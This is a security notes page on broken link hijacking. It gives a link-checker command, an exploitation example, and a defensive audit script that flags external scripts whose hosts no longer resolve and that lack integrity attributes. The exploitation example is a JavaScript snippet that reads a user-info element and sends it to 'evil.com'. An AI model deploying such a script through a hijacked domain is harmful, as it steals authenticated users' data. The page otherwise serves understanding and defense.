# Broken Links Hijacking

### Tools

```bash
# https://github.com/stevenvachon/broken-link-checker
blc -rfoi --exclude linkedin.com --exclude youtube.com --filter-level 3 https://example.com/
```

## Broken Link Hijacking

Broken Link Hijacking is an attack in which an attacker takes over the destination of a broken link. If the target website loads a resource such as a JavaScript file through a broken link, an attacker who hijacks that link can execute arbitrary code.

### Investigation

Assume the target website loads an external JavaScript file from `example.com`, a domain that no longer exists, as shown below.

```html
<script src="//example.com/script.js"></script>
```

If an attacker buys this domain, they can host an arbitrary JavaScript file named **`script.js`** in the `example.com` root directory.

### Exploitation Examples

An attacker can write arbitrary code in **`script.js`** from the example above to compromise users.\
For example, if the target website includes sensitive information about the authenticated user in the page where the broken link is loaded, the attacker can send this information to a server they own.

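```javascript
// script.js (served from the hijacked domain, runs in the target page's origin)
// Read the element's text; concatenating the element itself would only
// yield "[object HTMLElement]".
var secret = document.getElementById('userinfo').textContent;
var request = new XMLHttpRequest();
request.open('GET', 'http://evil.com/?data=' + secret, false);
request.send();
```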
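
To find this exposure in your own pages, the following added example (not from the original page or the referenced article) lists externally hosted `<script>` tags and flags those whose host no longer resolves and that carry no Subresource Integrity attribute. The sample HTML, the `target.example` and `cdn.example.net` names, and the `hostResolves` stand-in for a DNS lookup are constructed assumptions so the code runs offline.

```javascript
// Added example (constructed sample input; not from the original page).
const SAMPLE_HTML = `
<script src="//example.com/script.js"></script>
<script src="/static/app.js"></script>
<script src="https://cdn.example.net/lib.js" integrity="sha384-PLACEHOLDER" crossorigin="anonymous"></script>
<script>var inline = 1;</script>`;

// Hypothetical stand-in for a DNS lookup so the example runs offline.
const RESOLVING_HOSTS = new Set(['cdn.example.net']);
const hostResolves = (host) => RESOLVING_HOSTS.has(host);

// Returns one finding per externally hosted <script>. Regex parsing is a
// simplification for an audit script, not a full HTML parser.
function auditExternalScripts(html, pageUrl, resolves) {
  const page = new URL(pageUrl);
  const findings = [];
  const tagRe = /<script\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    // (?:^|\s) keeps attributes such as data-src from matching.
    const src = /(?:^|\s)src\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    if (!src) continue; // inline script: no remote file to take over
    const raw = src[1] ?? src[2] ?? src[3];
    let url;
    try {
      url = new URL(raw, page); // also resolves protocol-relative //host/path
    } catch {
      continue; // unparseable src
    }
    if (url.host === page.host) continue; // first-party file
    const hasIntegrity = /(?:^|\s)integrity\s*=/i.test(attrs);
    const live = resolves(url.hostname);
    // A dead host without SRI is the case described above: whoever
    // registers the domain decides what the browser executes.
    const risk = !live && !hasIntegrity ? 'high' : !hasIntegrity ? 'medium' : 'low';
    findings.push({ src: raw, host: url.hostname, hasIntegrity, hostResolves: live, risk });
  }
  return findings;
}

console.log(auditExternalScripts(SAMPLE_HTML, 'https://target.example/account', hostResolves));
```

A host that fails to resolve is only a candidate: confirm whether the domain is actually unregistered, then remove the tag or self-host the file.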

### References

* [EdOverflow](https://edoverflow.com/2017/broken-link-hijacking/)

